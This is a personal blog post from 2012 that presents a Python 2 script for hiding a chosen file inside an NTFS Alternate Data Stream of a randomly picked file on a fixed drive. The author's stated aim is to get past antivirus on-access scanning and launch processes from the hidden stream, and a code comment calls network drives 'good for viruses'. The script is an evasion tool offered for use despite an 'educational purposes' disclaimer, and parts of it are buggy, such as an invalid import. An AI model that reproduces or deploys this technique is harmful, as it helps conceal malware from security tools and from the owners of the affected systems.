______ Y ______
My own personal time capsule.
Tag Archives: evasion
Alternate Data Streams File Hider In Python
Posted by on February 13, 2012
Alternate Data Streams (ADS) is a nice little feature in NTFS system that practically allows to hide the files in one of the ‘streams’ mandatory supported by NTFS system. In practice, there are not many anty-viruses that check such streams thus it may be sometimes handy to lunch a new process from the ADS that wont be picked up by ‘on-access’ scan engine. The code below will use windows API ( kernel32.dll again ) to find static drives and write a file to ADS.
Steps to follow:
1) Enumerate all the partitions
2) Check for static drive
3) Get the list of first 1000 files
4) Select 1 of the files from the list
5) Use it to write to ADS
NOTE: ADS does not survive compression or many other file operations so once put in place it can be only copied to other locations
print "[+] Advance Data Stream Hider by Y"
print "[+] Will hide selected file in random ADS on the writable drive"
print "[+] contact : If you know me then give me a shout"
print "[+] usage: ./ads_hide.py <FILE_PATH>"
print "\n"
# define imports
import ctypes
import os
import random
import stat
import string
import sys.argv
#define kernel32 dll
kernel32 = ctypes.windll.kernel32
def getDrives():
print "[+] Enumerating the list of current partitions"
drivebits=kernel32.GetLogicalDrives()
partition_list = list()
for drives in range(1,26):
mask=1 << drives
if drivebits & mask:
drive_letter='%c:\\' % chr(ord('A')+drives)
partition_list.append(drive_letter)
print "\t[+]Found drive: %s" % drive_letter
return partition_list
def getDriveInfo(drives):
clean_list = list()
for dx in drives:
t = kernel32.GetDriveTypeA(dx)
if t == 3:
print "\t[+] Found Fixed Drive : " , dx
# if we have DRIVE_FIXED
clean_list.append(dx)
elif t == 4: # its DRIVE_REMOTE # <- this is good for viruses
pass
else:
# dont append any other type of drive
pass
return clean_list
def genRandomPath(drive):
# enumerate and return random path from the drive ( limit to 1000 possible variants for speed )
counter = 0
list_dirs = list()
for dirname, dirnames, filenames in os.walk(drive):
for nm in filenames:
list_dirs.append(os.path.join(dirname, nm))
counter +=1
if counter == 1000:
return list_dirs
else:
continue
def getRandomDrive(list_writable_drives):
print "[+] Selecting Partition"
size = len(list_writable_drives)
int = random.randrange(0,size)
return list_writable_drives[int]
def selectRandomPath(limit,list):
print "[+] Choosing $PATH"
int = random.randrange(0,limit)
return list[int]
def isFileWritable(filepath):
print "[+] Checking File Write Permission"
st = os.stat(filepath)
return bool(st.st_mode & stat.S_IWGRP )
def write(file,path):
filename,extension = str(file).split(".")
name = ''.join(random.choice(string.ascii_uppercase + string.digits + string.lowercase) for x in range(random.randrange(4,20)))
const = str(name)+"."+str(extension)
command = "type %s > %s:%s" % (file,path,const)
os.popen(command)
l = str(path)+":"+str(const)
print "[+] File Hidden In: %s" % l
def ADS_HIDE(FILE_PATH):
drives = getDrives()
print "[+] Checking Drive Type"
list_to_write = getDriveInfo(drives)
drive_to_search = getRandomDrive(list_to_write)
print "[+] Constructing ADS"
# first attempt to get files
path = selectRandomPath(1000,genRandomPath(drive_to_search))
# check permissions on the file
if (isFileWritable(path) == True):
print "[+] Writing to ADS"
write(FILE_PATH,path)
else:
# select another path from the list
path = selectRandomPath(1000,genRandomPath(drive_to_search))
print "[+] Writing to ADS"
write(FILE_PATH,path)
FILE = str(sys.argv[1])
ADS_HIDE(FILE)
Again, this code is here only for the educational purposes.
______ Y ______ 